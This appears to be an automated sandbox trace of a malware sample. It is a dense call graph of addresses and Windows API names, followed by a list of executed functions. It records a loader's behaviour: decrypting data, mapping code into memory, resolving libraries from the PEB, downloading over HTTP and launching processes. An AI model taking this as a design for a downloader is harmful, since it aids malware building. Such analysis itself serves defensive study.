39704 406283 39595->39704 39602 406498 39596->39602 39603 40648e 39596->39603 39604 40691b 39597->39604 39598 406633 39606 402360 39 API calls 39598->39606 39607 406550 39599->39607 39600->39704 40599 4071e0 53 API calls 2 library calls 39600->40599 39601->39704 40607 4074f0 53 API calls 2 library calls 39602->40607 40606 407470 53 API calls 2 library calls 39603->40606 39610 408dc0 43 API calls 39604->39610 39611 4066bc 39605->39611 39612 40663b 39606->39612 40614 407780 53 API calls 2 library calls 39607->40614 39616 406933 39610->39616 39617 4066c0 39611->39617 39618 40673e 39611->39618 40623 407b30 53 API calls 2 library calls 39612->40623 39615 40649d 39628 402430 43 API calls 39615->39628 39621 408e70 43 API calls 39616->39621 40628 407cd0 53 API calls 2 library calls 39617->40628 40634 407e50 53 API calls 2 library calls 39618->40634 39620 406555 39630 402430 43 API calls 39620->39630 39624 406640 39633 402430 43 API calls 39624->39633 39626 406743 39636 402430 43 API calls 39626->39636 39627 4066c5 39637 402430 43 API calls 39627->39637 39631 4064ad 39628->39631 39634 406565 39630->39634 39645 402360 39 API calls 39631->39645 39638 406650 39633->39638 40615 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39634->40615 39641 406753 39636->39641 39642 4066d5 39637->39642 40624 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39638->40624 39657 402360 39 API calls 39641->39657 40629 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39642->40629 39644 40656e 39649 402360 39 API calls 39644->39649 39651 4064c1 39645->39651 39648 406659 39654 402360 39 API calls 39648->39654 39650 406576 39649->39650 39651->39704 40608 407580 53 API calls 2 library calls 39651->40608 39653 4066de 39658 402360 39 API calls 39653->39658 39663 406767 39657->39663 39664 4066e6 39658->39664 39667 40676b 39663->39667 39668 4067be 39663->39668 40630 407d50 53 API calls 2 library calls 39664->40630 40635 407ee0 53 API calls 2 library calls 39667->40635 40640 408060 53 API calls 2 library calls 39668->40640 39676 4067c3 39704->39500 40647 402330 43 API calls 39704->40647 40620 407a20 53 API calls 2 library calls 39745->40620 40646 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39760->40646 39820->39448 39821->39448 39824->38264 39825->38264 39826->38264 39828 409358 39827->39828 39831 4092ea __InternalCxxFrameHandler 39827->39831 40675 409590 43 API calls 4 library calls 39828->40675 39830 40936a 39830->38264 39831->38264 39833 401e70 39832->39833 39833->39833 39834 402730 43 API calls 39833->39834 39835 401e83 39834->39835 39836 402730 43 API calls 39835->39836 39837 401fc1 __InternalCxxFrameHandler 39836->39837 40676 40d0b0 39837->40676 39840 402169 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39842 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39840->39842 39841 4020f9 39841->39840 39843 402198 39841->39843 39844 40218d 39842->39844 39845 40cfaf 39 API calls 39843->39845 39844->38264 39846 40219d 39845->39846 39847 401e20 43 API calls 39846->39847 39848->38278 39850->38263 39851->38281 39852->38301 39853->38318 39854->38541 39855->38265 39856->38277 39857->38299 39858->38320 39859->38541 39860->38256 39861->38292 39862->38312 39863->38324 39864->38344 39865->38357 39866->38453 39867->38403 39868->38453 39869->38295 39870->38330 39871->38348 39872->38358 39873->38377 39874->38401 39875->38453 39876->38455 39877->38502 39878->38331 39879->38363 39880->38383 39881->38402 39882->38427 39883->38454 39884->38480 39885->38496 39886->38542 39887->38548 39888->38582 39889->38362 39890->38406 39891->38431 39892->38459 39893->38484 39894->38507 39895->38529 39896->38405 39897->38463 39898->38489 39899->38511 39900->38535 39901->38553 39902->38569 39903->38462 39904->38515 39905->38539 39906->38555 39907->38574 39908->38590 39909->38513 39910->38556 39911->38576 39912->38587 39913->38600 39914->38590 39915->38430 39916->38334 39917->38612 39918->38624 39920->38622 39921->38633 39922->38647 39923->38651 39924->38655 39926 41066b 21 API calls 39925->39926 39927 403c27 39926->39927 39929 4128be 39928->39929 39930 4128b8 39928->39930 39934 4128c2 39929->39934 39958 4135a5 6 API calls _unexpected 39929->39958 39957 413566 6 API calls _unexpected 39930->39957 39933 4128da 39933->39934 39935 4128e2 39933->39935 39937 412947 SetLastError 39934->39937 39959 413254 14 API calls 2 library calls 39935->39959 39939 405a88 Sleep 39937->39939 39940 412957 39937->39940 39938 4128ef 39941 4128f7 39938->39941 39942 412908 39938->39942 39939->38230 39970 4110c9 39 API calls __CreateFrameInfo 39940->39970 39960 4135a5 6 API calls _unexpected 39941->39960 39961 4135a5 6 API calls _unexpected 39942->39961 39947 412914 39948 412918 39947->39948 39949 41292f 39947->39949 39962 4135a5 6 API calls _unexpected 39948->39962 39969 4126d0 14 API calls _unexpected 39949->39969 39953 41293a 39956 4132b1 ___free_lconv_mon 14 API calls 39953->39956 39954 412905 39963 4132b1 39954->39963 39955 41292c 39955->39937 39956->39955 39957->39929 39958->39933 39959->39938 39960->39954 39961->39947 39962->39954 39964 4132e6 39963->39964 39965 4132bc RtlFreeHeap 39963->39965 39964->39955 39965->39964 39966 4132d1 GetLastError 39965->39966 39967 4132de __dosmaperr 39966->39967 39971 40d09d 14 API calls __dosmaperr 39967->39971 39969->39953 39971->39964 39972->38662 39973->38670 39974->38682 39975->38684 39976->38686 39977->38708 39978->38711 39979->38704 39980->38718 39981->38720 39982->38722 39983->38728 39984->38731 39985->38724 39986->38739 39988 409133 39987->39988 39989 4092bd 39988->39989 39990 4091fd 39988->39990 39998 409138 __InternalCxxFrameHandler 39988->39998 40006 4015d0 43 API calls 3 library calls 39989->40006 39993 409232 39990->39993 39994 409258 39990->39994 39992 4092c2 40007 401530 41 API calls 3 library calls 39992->40007 39993->39992 39996 40923d 39993->39996 40003 40924a __InternalCxxFrameHandler 39994->40003 40005 401530 41 API calls 4 library calls 39994->40005 40004 401530 41 API calls 4 library calls 39996->40004 39997 409243 40001 40cfaf 39 API calls 39997->40001 39997->40003 39998->38743 40002 4092cc 40001->40002 40003->38743 40004->39997 40005->40003 40006->39992 40007->39997 40008->38754 40009->38760 40010->38749 40011->38754 40016 40248e __InternalCxxFrameHandler 40012->40016 40017 4024b4 40012->40017 40013 402594 40243 4015d0 43 API calls 3 library calls 40013->40243 40015 402599 40244 401530 41 API calls 3 library calls 40015->40244 40016->38773 40017->40013 40019 402523 40017->40019 40020 4024ef 40017->40020 40025 40250f __InternalCxxFrameHandler 40019->40025 40242 401530 41 API calls 4 library calls 40019->40242 40020->40015 40241 401530 41 API calls 4 library calls 40020->40241 40022 40259e 40024 40cfaf 39 API calls 40024->40013 40025->40024 40026 402576 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40025->40026 40026->38773 40028 4036fa GetLastError CryptReleaseContext 40027->40028 40029 40363e CryptCreateHash 40027->40029 40031 403844 40028->40031 40029->40028 40030 403662 40029->40030 40035 409b4a 41 API calls 40030->40035 40032 40386a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40031->40032 40034 403892 40031->40034 40033 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40032->40033 40036 40388e 40033->40036 40038 40cfaf 39 API calls 40034->40038 40037 40369a 40035->40037 40036->38818 40245 40fcdf 40037->40245 40040 403897 40038->40040 40040->38818 40042 4036d6 CryptDeriveKey 40042->40028 40044 403715 40042->40044 40043 4036c8 GetLastError 40043->40031 40045 40fb0d ___std_exception_copy 15 API calls 40044->40045 40046 40371b __InternalCxxFrameHandler 40045->40046 40047 409b4a 41 API calls 40046->40047 40050 40373a __InternalCxxFrameHandler 40047->40050 40048 403838 CryptDestroyKey 40048->40031 40049 4037ac CryptDecrypt 40049->40048 40049->40050 40050->40048 40050->40049 40052 402ee0 SetLastError 40051->40052 40053 402f08 40051->40053 40300 4029f0 70 API calls 40052->40300 40055 402f12 40053->40055 40056 402f49 SetLastError 40053->40056 40072 402f71 40053->40072 40301 4029f0 70 API calls 40055->40301 40302 4029f0 70 API calls 40056->40302 40057 402ef2 40059 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40057->40059 40062 402f04 40059->40062 40061 402f5b 40064 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40061->40064 40062->38818 40063 402f1c SetLastError 40065 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40063->40065 40066 402f6d 40064->40066 40068 402f39 40065->40068 40066->38818 40067 402fe7 GetNativeSystemInfo 40067->40055 40069 403016 VirtualAlloc 40067->40069 40068->38818 40070 403030 VirtualAlloc 40069->40070 40071 403056 HeapAlloc 40069->40071 40070->40071 40073 403042 40070->40073 40077 403077 VirtualFree 40071->40077 40078 40308b 40071->40078 40072->40055 40072->40067 40303 4029f0 70 API calls 40073->40303 40076 40304c 40076->40071 40077->40078 40079 4030d7 SetLastError 40078->40079 40080 40316f VirtualAlloc 40078->40080 40081 4030df 40079->40081 40088 40318a __InternalCxxFrameHandler __CreateFrameInfo 40080->40088 40304 40fab8 40081->40304 40083 403132 HeapFree 40092 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40083->40092 40086 40330c 40086->40081 40293 402b50 40086->40293 40087 40fab8 ___std_exception_destroy 14 API calls 40087->40083 40088->40079 40088->40081 40091 40326a 40088->40091 40284 402e30 VirtualAlloc 40088->40284 40285 402cd0 40091->40285 40094 40316b 40092->40094 40093 40331b 40093->40081 40095 403323 40093->40095 40094->38818 40096 4033aa 40095->40096 40097 40335a 40095->40097 40098 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40096->40098 40099 403394 40097->40099 40100 403365 40097->40100 40102 4033c0 40098->40102 40101 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40099->40101 40104 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40100->40104 40103 4033a6 40101->40103 40102->38818 40103->38818 40105 403390 40104->40105 40105->38818 40108 100010ad 40107->40108 40109 100010bd CoUninitialize 40108->40109 40324 10005956 GetSystemTimeAsFileTime 40110->40324 40112 10001f48 40326 100059d5 40112->40326 40114 10001f4f __FrameHandler3::FrameUnwindToState 40329 10001523 40114->40329 40116 10002174 40117 100010a3 CoUninitialize 40116->40117 40119 10002188 40117->40119 40371 100026ff 40119->40371 40121 10002025 40359 10001cdd 49 API calls __EH_prolog3_GS 40121->40359 40122 1000219b 40122->38873 40124 1000202e 40152 10002164 40124->40152 40360 100059b4 37 API calls _unexpected 40124->40360 40126 10001bb9 25 API calls 40128 10002172 40126->40128 40127 10002040 40361 10001c33 39 API calls 40127->40361 40128->40116 40130 10002052 40362 10002493 27 API calls __InternalCxxFrameHandler 40130->40362 40132 1000205f 40363 10002230 27 API calls __InternalCxxFrameHandler 40132->40363 40134 10002079 40364 10002230 27 API calls __InternalCxxFrameHandler 40134->40364 40136 1000209f 40365 1000219f 27 API calls __InternalCxxFrameHandler 40136->40365 40138 100020a9 40366 10001bb9 40138->40366 40141 10001bb9 25 API calls 40142 100020bb 40141->40142 40143 10001bb9 25 API calls 40142->40143 40144 100020c4 40143->40144 40370 10001725 8 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 40144->40370 40146 100020df __FrameHandler3::FrameUnwindToState 40147 10002100 CreateProcessA 40146->40147 40148 10002135 40147->40148 40149 1000213c ShellExecuteA 40147->40149 40148->40149 40150 1000215b 40148->40150 40149->40150 40151 10001bb9 25 API calls 40150->40151 40151->40152 40152->40126 40153->38773 40154->38773 40155->38773 40156->38818 40157->38818 40158->38818 40161->38846 40162->38846 40163->38846 40164->38861 40166->38845 40167->38864 40168->38887 40169->38904 40170->38920 40171->38847 40172->38860 40173->38885 40174->38906 40175->38920 40176->38838 40177->38877 40178->38898 40179->38911 40180->38932 40181->38946 40182->38985 40183->38990 40184->38985 40185->38880 40186->38917 40187->38936 40188->38947 40189->38966 40190->38988 40191->38985 40192->39044 40193->38909 40194->38918 40195->38952 40196->38972 40197->38993 40198->39017 40199->39043 40200->39069 40201->39085 40202->39129 40203->39135 40204->38945 40205->38951 40206->38996 40207->39021 40208->39048 40209->39073 40210->39095 40211->39117 40212->38995 40213->39052 40214->39078 40215->39099 40216->39123 40217->39140 40218->39156 40219->39051 40220->39103 40221->39127 40222->39142 40223->39161 40224->39176 40225->39101 40226->39143 40227->39163 40228->39173 40229->39186 40230->39176 40231->39020 40232->38922 40241->40025 40242->40025 40243->40015 40244->40022 40246 40fcf2 ___std_exception_copy 40245->40246 40251 40fb18 40246->40251 40252 40fb4e 40251->40252 40253 40fb62 40252->40253 40256 40fb86 40252->40256 40263 40fb7b 40252->40263 40276 40cf22 39 API calls ___std_exception_copy 40253->40276 40255 40fb96 40258 40fbc6 40255->40258 40259 40fba8 40255->40259 40256->40255 40277 40f660 39 API calls 2 library calls 40256->40277 40261 40fbd4 40258->40261 40262 40fc8c 40258->40262 40278 414d57 5 API calls ___scrt_uninitialize_crt 40259->40278 40261->40263 40279 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 40261->40279 40262->40263 40281 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 40262->40281 40270 40ccdb 40263->40270 40266 40fc0a 40266->40263 40267 40fc15 GetLastError 40266->40267 40267->40263 40268 40fc35 40267->40268 40268->40263 40280 414cbe MultiByteToWideChar ___scrt_uninitialize_crt 40268->40280 40271 40cce7 40270->40271 40272 40ccfe 40271->40272 40282 40cd86 39 API calls 2 library calls 40271->40282 40274 4036ac CryptHashData 40272->40274 40283 40cd86 39 API calls 2 library calls 40272->40283 40274->40042 40274->40043 40276->40263 40277->40255 40278->40263 40279->40266 40280->40263 40281->40263 40282->40272 40283->40274 40284->40088 40286 402e22 40285->40286 40290 402cf0 40285->40290 40286->40086 40287 402e11 SetLastError 40287->40086 40288 402df4 SetLastError 40288->40086 40290->40286 40290->40287 40290->40288 40291 402dd5 SetLastError 40290->40291 40291->40086 40294 402b83 40293->40294 40295 402ca2 40294->40295 40299 402c99 40294->40299 40307 402a20 40294->40307 40296 402a20 52 API calls 40295->40296 40297 402cb4 40296->40297 40297->40093 40299->40093 40300->40057 40301->40063 40302->40061 40303->40076 40305 4132b1 ___free_lconv_mon 14 API calls 40304->40305 40306 4030fe 40305->40306 40306->40083 40306->40087 40308 402a39 40307->40308 40316 402a75 40307->40316 40309 402a8e VirtualProtect 40308->40309 40311 402a44 40308->40311 40313 402ad2 GetLastError FormatMessageA 40309->40313 40309->40316 40310 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40312 402a8a 40310->40312 40311->40316 40322 402e50 VirtualFree 40311->40322 40312->40294 40314 402af7 40313->40314 40314->40314 40315 402afe LocalAlloc 40314->40315 40323 4029b0 44 API calls 40315->40323 40316->40310 40318 402b21 OutputDebugStringA LocalFree LocalFree 40319 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40318->40319 40320 402b47 40319->40320 40320->40294 40322->40316 40323->40318 40325 10005988 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 40324->40325 40325->40112 40378 10006e9c GetLastError 40326->40378 40330 1000152f __EH_prolog3_GS 40329->40330 40422 1000184b 40330->40422 40332 10001593 40426 1000190a 40332->40426 40334 100015ff 40431 1000179a 40334->40431 40336 10001541 40336->40332 40341 1000179a 27 API calls 40336->40341 40337 1000160d 40436 10005939 40337->40436 40340 10001650 InternetSetOptionA InternetConnectA 40344 10001692 HttpOpenRequestA 40340->40344 40345 100016e8 InternetCloseHandle 40340->40345 40341->40332 40342 10001704 40347 10001bb9 25 API calls 40342->40347 40343 100016eb 40343->40342 40485 10001bdc 25 API calls 40343->40485 40348 100016e2 InternetCloseHandle 40344->40348 40349 100016bc 40344->40349 40345->40343 40350 1000171b 40347->40350 40348->40345 40439 100010c7 40349->40439 40486 1000e8a5 40350->40486 40355 100016d3 40453 10001175 40355->40453 40356 100016df InternetCloseHandle 40356->40348 40359->40124 40360->40127 40361->40130 40362->40132 40363->40134 40364->40136 40365->40138 40367 10001bc4 40366->40367 40368 10001bcc 40366->40368 40529 10001bdc 25 API calls 40367->40529 40368->40141 40370->40146 40372 10002707 40371->40372 40373 10002708 IsProcessorFeaturePresent 40371->40373 40372->40122 40375 10002b1c 40373->40375 40530 10002adf SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40375->40530 40377 10002bff 40377->40122 40379 10006eb3 40378->40379 40380 10006eb9 40378->40380 40407 10007580 6 API calls _unexpected 40379->40407 40384 10006ebf SetLastError 40380->40384 40408 100075bf 6 API calls _unexpected 40380->40408 40383 10006ed7 40383->40384 40385 10006edb 40383->40385 40389 10006f53 40384->40389 40390 100059df 40384->40390 40409 10007aa7 14 API calls 2 library calls 40385->40409 40388 10006ee7 40391 10006f06 40388->40391 40392 10006eef 40388->40392 40420 10006928 37 API calls __FrameHandler3::FrameUnwindToState 40389->40420 40390->40114 40417 100075bf 6 API calls _unexpected 40391->40417 40410 100075bf 6 API calls _unexpected 40392->40410 40396 10006efd 40411 10007a3c 40396->40411 40398 10006f12 40399 10006f16 40398->40399 40400 10006f27 40398->40400 40418 100075bf 6 API calls _unexpected 40399->40418 40419 10006c9e 14 API calls _unexpected 40400->40419 40404 10006f03 40404->40384 40405 10006f32 40406 10007a3c _free 14 API calls 40405->40406 40406->40404 40407->40380 40408->40383 40409->40388 40410->40396 40412 10007a70 __dosmaperr 40411->40412 40413 10007a47 RtlFreeHeap 40411->40413 40412->40404 40413->40412 40414 10007a5c 40413->40414 40421 10005926 14 API calls __strnicoll 40414->40421 40416 10007a62 GetLastError 40416->40412 40417->40398 40418->40396 40419->40405 40421->40416 40423 10001868 40422->40423 40423->40423 40424 1000190a 27 API calls 40423->40424 40425 1000187c 40424->40425 40425->40336 40427 10001978 40426->40427 40430 10001920 __InternalCxxFrameHandler 40426->40430 40489 10001a59 27 API calls std::_Xinvalid_argument 40427->40489 40430->40334 40432 100017eb 40431->40432 40435 100017b3 __InternalCxxFrameHandler 40431->40435 40490 10001884 27 API calls 40432->40490 40435->40337 40491 100070ee 40436->40491 40440 100010d3 __EH_prolog3_GS 40439->40440 40441 1000184b 27 API calls 40440->40441 40442 100010e3 HttpAddRequestHeadersA 40441->40442 40517 100017f1 40442->40517 40444 10001112 HttpAddRequestHeadersA 40445 100017f1 27 API calls 40444->40445 40446 10001132 HttpAddRequestHeadersA 40445->40446 40447 100017f1 27 API calls 40446->40447 40448 10001152 HttpAddRequestHeadersA 40447->40448 40449 10001bb9 25 API calls 40448->40449 40450 1000116d 40449->40450 40451 1000e8a5 5 API calls 40450->40451 40452 10001172 HttpSendRequestA 40451->40452 40452->40355 40452->40356 40454 10001184 __EH_prolog3_GS 40453->40454 40455 100011c5 InternetSetFilePointer 40454->40455 40456 100011e3 InternetReadFile 40455->40456 40458 1000121d __InternalCxxFrameHandler 40456->40458 40457 10001260 __FrameHandler3::FrameUnwindToState 40459 1000127d HttpQueryInfoA 40457->40459 40458->40456 40458->40457 40460 100012a6 CoCreateInstance 40459->40460 40461 1000150a 40459->40461 40460->40461 40462 100012d8 40460->40462 40463 1000e8a5 5 API calls 40461->40463 40462->40461 40465 1000184b 27 API calls 40462->40465 40464 10001520 40463->40464 40464->40356 40466 100012f7 40465->40466 40522 10001006 30 API calls 40466->40522 40468 1000130c 40469 10001bb9 25 API calls 40468->40469 40476 1000134f __FrameHandler3::FrameUnwindToState 40469->40476 40470 1000149d 40526 10005926 14 API calls __strnicoll 40470->40526 40471 10001427 __InternalCxxFrameHandler 40471->40470 40473 100014ae __InternalCxxFrameHandler 40471->40473 40475 100014aa __FrameHandler3::FrameUnwindToState 40471->40475 40473->40461 40474 100014a2 40528 1000584c 25 API calls __strnicoll 40474->40528 40475->40473 40527 10005926 14 API calls __strnicoll 40475->40527 40476->40471 40476->40473 40479 10001456 40476->40479 40480 10001449 40476->40480 40479->40471 40524 10005926 14 API calls __strnicoll 40479->40524 40523 10005926 14 API calls __strnicoll 40480->40523 40483 1000144e 40525 1000584c 25 API calls __strnicoll 40483->40525 40485->40342 40487 100026ff __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 40486->40487 40488 10001722 40487->40488 40488->40116 40488->40121 40494 10007102 40491->40494 40492 10007106 40509 10001629 InternetOpenA 40492->40509 40510 10005926 14 API calls __strnicoll 40492->40510 40494->40492 40496 10007140 40494->40496 40494->40509 40495 10007130 40511 1000584c 25 API calls __strnicoll 40495->40511 40512 100069d1 37 API calls 2 library calls 40496->40512 40499 1000714c 40500 10007156 40499->40500 40503 1000716d 40499->40503 40513 1000a31e 25 API calls __strnicoll 40500->40513 40502 100071ef 40502->40509 40514 10005926 14 API calls __strnicoll 40502->40514 40503->40502 40504 10007244 40503->40504 40504->40509 40516 10005926 14 API calls __strnicoll 40504->40516 40507 10007238 40515 1000584c 25 API calls __strnicoll 40507->40515 40509->40340 40509->40343 40510->40495 40511->40509 40512->40499 40513->40509 40514->40507 40515->40509 40516->40509 40518 100017ff 40517->40518 40518->40518 40519 1000180d __InternalCxxFrameHandler 40518->40519 40521 1000188f 27 API calls __InternalCxxFrameHandler 40518->40521 40519->40444 40521->40519 40522->40468 40523->40483 40524->40483 40525->40471 40526->40474 40527->40474 40528->40473 40529->40368 40530->40377 40532 4128a2 _unexpected 39 API calls 40531->40532 40533 410686 40532->40533 40533->39256 40656 408a70 40534->40656 40536 403d02 40536->39256 40537 410681 39 API calls 40538 403ca2 40537->40538 40538->40536 40538->40537 40670 408fb0 43 API calls 3 library calls 40538->40670 40541 40226b 40540->40541 40542 40220d 40540->40542 40544 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40541->40544 40542->40541 40543 402213 CreateFileA 40542->40543 40543->40541 40545 402233 WriteFile CloseHandle 40543->40545 40546 402279 40544->40546 40547 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 40545->40547 40546->39296 40548 402265 40547->40548 40548->39296 40549->39265 40550->39270 40551->39267 40552->39278 40553->39286 40554->39280 40555->39316 40556->39324 40557->39317 40558->39334 40559->39342 40560->39339 40561->39371 40562->39381 40563->39373 40564->39409 40565->39416 40566->39423 40567->39405 40568->39293 40569->39293 40570->39293 40571->39372 40572->39372 40573->39372 40576->39417 40577->39417 40578->39417 40579->39435 40581->39415 40582->39438 40583->39464 40584->39484 40585->39704 40586->39418 40587->39434 40588->39462 40589->39482 40590->39704 40591->39402 40592->39452 40593->39475 40594->39491 40595->39510 40596->39522 40597->39561 40598->39565 40599->39561 40600->39455 40601->39494 40602->39511 40603->39524 40604->39543 40605->39566 40606->39561 40607->39615 40608->39485 40609->39497 40610->39528 40611->39547 40612->39569 40613->39593 40614->39620 40615->39644 40620->39527 40621->39572 40622->39598 40623->39624 40624->39648 40627->39571 40628->39627 40629->39653 40634->39626 40640->39676 40646->39595 40647->39500 40658 408a8b 40656->40658 40669 408b74 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40656->40669 40657 408c01 40673 4015d0 43 API calls 3 library calls 40657->40673 40658->40657 40661 408b21 40658->40661 40662 408afa 40658->40662 40668 408b0b __InternalCxxFrameHandler 40658->40668 40658->40669 40660 408c06 40674 401530 41 API calls 3 library calls 40660->40674 40661->40668 40672 401530 41 API calls 4 library calls 40661->40672 40662->40660 40671 401530 41 API calls 4 library calls 40662->40671 40664 408c0b 40667 40cfaf 39 API calls 40667->40657 40668->40667 40668->40669 40669->40538 40670->40538 40671->40668 40672->40668 40673->40660 40674->40664 40675->39830 40679 412b8d 40676->40679 40683 412ba1 40679->40683 40680 412ba5 40696 40200e InternetOpenA 40680->40696 40698 40d09d 14 API calls __dosmaperr 40680->40698 40682 412bcf 40699 40cf9f 39 API calls ___std_exception_copy 40682->40699 40683->40680 40685 412bdf 40683->40685 40683->40696 40700 40d0cd 39 API calls 2 library calls 40685->40700 40687 412beb 40688 412bf5 40687->40688 40693 412c0c 40687->40693 40701 4193d9 39 API calls 2 library calls 40688->40701 40690 412cee 40690->40696 40704 40d09d 14 API calls __dosmaperr 40690->40704 40692 412c96 40692->40696 40702 40d09d 14 API calls __dosmaperr 40692->40702 40693->40690 40693->40692 40695 412ce2 40703 40cf9f 39 API calls ___std_exception_copy 40695->40703 40696->39841 40698->40682 40699->40696 40700->40687 40701->40696 40702->40695 40703->40696 40704->40696 40706 4104cc 40705->40706 40707 4104de 40705->40707 40732 40a69e GetModuleHandleW 40706->40732 40717 410330 40707->40717 40710 4104d1 40710->40707 40733 410580 GetModuleHandleExW 40710->40733 40712 40a1e4 40712->38210 40718 41033c ___scrt_is_nonwritable_in_current_image 40717->40718 40739 41088b EnterCriticalSection 40718->40739 40720 410346 40740 4103b7 40720->40740 40722 410353 40744 410371 40722->40744 40725 410536 40749 410567 40725->40749 40727 410540 40728 410554 40727->40728 40729 410544 GetCurrentProcess TerminateProcess 40727->40729 40730 410580 __CreateFrameInfo 3 API calls 40728->40730 40729->40728 40731 41055c ExitProcess 40730->40731 40732->40710 40734 4105e0 40733->40734 40735 4105bf GetProcAddress 40733->40735 40737 4105e6 FreeLibrary 40734->40737 40738 4104dd 40734->40738 40735->40734 40736 4105d3 40735->40736 40736->40734 40737->40738 40738->40707 40739->40720 40742 4103c3 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo 40740->40742 40741 410427 __CreateFrameInfo 40741->40722 40742->40741 40747 411fe5 14 API calls 2 library calls 40742->40747 40748 4108d3 LeaveCriticalSection 40744->40748 40746 41035f 40746->40712 40746->40725 40747->40741 40748->40746 40752 414fe9 5 API calls __CreateFrameInfo 40749->40752 40751 41056c __CreateFrameInfo 40751->40727 40752->40751 40753 9b360a 40754 9b3629 40753->40754 40755 9b3638 RegOpenKeyA 40754->40755 40756 9b365f RegOpenKeyA 40754->40756 40755->40756 40757 9b3655 40755->40757 40758 9b367c 40756->40758 40757->40756 40759 9b36c0 GetNativeSystemInfo 40758->40759 40760 9b36cb 40758->40760 40759->40760 40761 10005bf4 40762 10007a3c _free 14 API calls 40761->40762 40763 10005c0c 40762->40763 40764 4b6003c 40765 4b60049 40764->40765 40779 4b60e0f SetErrorMode SetErrorMode 40765->40779 40770 4b60265 40771 4b602ce VirtualProtect 40770->40771 40773 4b6030b 40771->40773 40772 4b60439 VirtualFree 40776 4b604be 40772->40776 40777 4b605f4 LoadLibraryA 40772->40777 40773->40772 40774 4b604e3 LoadLibraryA 40774->40776 40776->40774 40776->40777 40778 4b608c7 40777->40778 40780 4b60223 40779->40780 40781 4b60d90 40780->40781 40782 4b60dad 40781->40782 40783 4b60dbb GetPEB 40782->40783 40784 4b60238 VirtualAlloc 40782->40784 40783->40784 40784->40770 40785 9b2861 40786 9b4539 LoadLibraryA 40785->40786 40787 100079ee 40788 10007a2c 40787->40788 40792 100079fc _unexpected 40787->40792 40795 10005926 14 API calls __strnicoll 40788->40795 40790 10007a17 RtlAllocateHeap 40791 10007a2a 40790->40791 40790->40792 40792->40788 40792->40790 40794 10005aed EnterCriticalSection LeaveCriticalSection _unexpected 40792->40794 40794->40792 40795->40791

                                                Executed Functions

                                                Function 00403D20 Relevance: 56.1, APIs: 25, Strings: 6, Instructions: 1839sleepcomCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,?,024FEF0D,76230F00,00000000), ref: 00403D8A
                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F19
                                                • Sleep.KERNEL32(000003E8), ref: 00403F22
                                                • __Init_thread_footer.LIBCMT ref: 004044F7
                                                • __Init_thread_footer.LIBCMT ref: 004046BD
                                                • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 004048C7
                                                • __Init_thread_footer.LIBCMT ref: 00404955
                                                • __Init_thread_footer.LIBCMT ref: 00404BBE
                                                • CoInitialize.OLE32(00000000), ref: 00404C3F
                                                • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404C5A
                                                • __Init_thread_footer.LIBCMT ref: 004050BD
                                                • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                                • __Init_thread_footer.LIBCMT ref: 004053CB
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404CC8
                                                  • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,024FEF0D), ref: 004107F7
                                                  • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                                • CoUninitialize.COMBASE(?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D,?,?,?,?,00000000,0042DA28), ref: 00404D01
                                                • CoUninitialize.OLE32(?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404DC4
                                                • CoUninitialize.OLE32(?,?,?,?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404E45
                                                • __Init_thread_footer.LIBCMT ref: 00404026
